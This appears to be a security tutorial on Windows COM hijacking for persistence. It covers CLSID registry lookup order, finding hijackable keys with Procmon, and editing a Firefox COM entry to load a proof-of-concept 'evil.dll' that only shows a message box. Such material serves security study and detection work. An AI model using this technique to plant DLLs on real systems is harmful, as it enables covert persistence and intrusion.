Secondary Categories: 02-Malware 02-Persistence
Description:
A Component Object Model was introduced in Windows 3.11 and is an object-oriented system meant to create binary software components that can interact with each other. This technology allows you to reuse items without knowing how they were made internally.
When a software needs to load a COM object, it uses the Windows API CoCreateInstance to construct an uninitialized object instance of a specific class, with the CLSID (class identifier) as one of the needed parameters. When a program calls CoCreateInstance with a particular CLSID valu, the operating system consults the registry to discover which binary contains the requested COM code
As seen in the photo above you can see that the A1DB7B5E-D0EA-4FE0-93C4-314505788272 CLSID subfolder InProcServer32 has the default registry entry for TaskflowDataEngine.dll.
Depending on how the program is run it could be in one of the following subfolders:
- InprocServer/InprocServer32
- LocalServer/LocalServer32
- TreatAs
- ProgID
and the top level folder in the registry would be in
HKEY_CURRENT_USER\Software\Classes\<CLSID>HKEY_LOCAL_MACHINE\Software\Classes\<CLSID>
Discovery
In order to find COM keys that could be used to hijack you can use Procmon and use the following filters:
Also still good to add: _Exclude if path starts with HKLM
When loading a COM object the HKEY Current User (HKCU) is examined first when trying to load COM objects, giving preference to user-specified COM objects. Then the COM object is looked up in HKEY CLASSES ROOT (HCKR) which is really just HKLM
Example
In the example below firefox.exe looks up COM object with the CLSID A6FF50C0-56C0-71CA-5732-BED303A59628. If we search for this CLSID in the HKCU registry we can see that its not found, but it is found in the HCKR registry.
We can then export this entry and modify it to include our malicious DLL
The code being executed:
/*
evil.cpp
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")
BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
switch (nReason) {
case DLL_PROCESS_ATTACH:
MessageBox(
NULL,
"Meow from evil.dll!",
"=^..^=",
MB_OK
);
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}Compiling DLL:
x86_64-w64-mingw32-g++ -shared -o evil.dll evil.cpp -fpermissiveNow with our registry export file modified and a working malicious DLL we can then import it into the registry
Now that this is done we can close firefox and re run it and see our malicious DLL is ran
Extra
Note that once our DLL is ran by firefox we can use process hacker to get the PID. The PID for the message box is 9272, but if we just view the firefox process and its child process we can see that PID 9272 is not there.
Resources:
| Title | URL |
|---|---|
| COM DLL Hijacking | https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html |